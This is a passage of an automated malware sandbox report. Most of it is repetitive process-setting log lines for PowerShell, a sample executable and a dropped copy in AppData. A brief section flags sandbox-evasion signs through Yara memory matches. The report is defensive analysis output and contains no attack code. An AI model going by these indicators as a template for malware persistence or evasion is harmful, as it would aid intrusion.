                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aoTiGLRa.exe PID: 7560, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 9020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: 78D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ti5nuRV7y4.exeMemory allocated: A020000 memory reserve | memory write watchJump to behavior
